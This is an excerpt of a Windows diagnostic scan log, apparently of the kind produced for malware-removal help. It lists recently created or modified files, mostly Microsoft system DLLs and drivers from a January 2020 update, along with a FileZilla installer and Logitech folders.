2020-01-21 11:01 - 2020-01-21 11:01 - 008000936 _____ (Tim Kosse) C:\Users\Jomko\Downloads\FileZilla_3.46.3_win64-setup.exe
2020-01-16 13:58 - 2020-01-16 13:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-01-16 13:57 - 2020-01-16 13:57 - 000000000 ____D C:\Program Files\Logitech
2020-01-16 00:57 - 2020-01-16 00:57 - 000000000 ____D C:\Windows\rescache
2020-01-15 23:25 - 2019-12-31 03:40 - 000123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-01-15 23:25 - 2019-12-31 03:32 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 004061624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 003967416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:41 - 001320248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000834048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:37 - 000709856 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000627424 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000263904 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000096992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-01-15 21:37 - 2020-01-03 04:37 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:36 - 000155360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-01-15 21:37 - 2020-01-03 04:35 - 001671296 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001010688 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:10 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:09 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-01-15 21:37 - 2020-01-03 04:05 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:04 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-01-15 21:37 - 2020-01-03 04:02 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:01 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-01-15 21:37 - 2020-01-03 04:01 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2020-01-15 21:37 - 2020-01-03 04:00 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-01-15 21:37 - 2020-01-03 03:57 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-01-15 21:37 - 2020-01-03 03:56 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-01-15 21:37 - 2020-01-03 03:55 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-01-15 21:37 - 2019-12-31 04:04 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\EOSNotify.exe
2020-01-15 21:37 - 2019-12-18 18:45 - 000390536 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-01-15 21:37 - 2019-12-18 17:48 - 000341896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-01-15 21:37 - 2019-12-17 03:39 - 025754624 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-01-15 21:37 - 2019-12-17 02:18 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 02:18 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2020-01-15 21:37 - 2019-12-17 02:06 - 002910720 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2020-01-15 21:37 - 2019-12-17 02:04 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 02:03 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:57 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:56 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:54 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:53 - 005500928 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 020290048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000797184 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:52 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2020-01-15 21:37 - 2019-12-17 01:49 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 01:45 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2020-01-15 21:37 - 2019-12-17 01:42 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2020-01-15 21:37 - 2019-12-17 01:36 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:35 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:33 - 002304000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-01-15 21:37 - 2019-12-17 01:32 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:31 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:28 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000662528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:26 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-01-15 21:37 - 2019-12-17 01:14 - 015445504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:14 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:13 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:11 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:10 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:09 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:08 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2020-01-15 21:37 - 2019-12-17 01:04 - 004859392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-01-15 21:37 - 2019-12-17 01:03 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:02 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
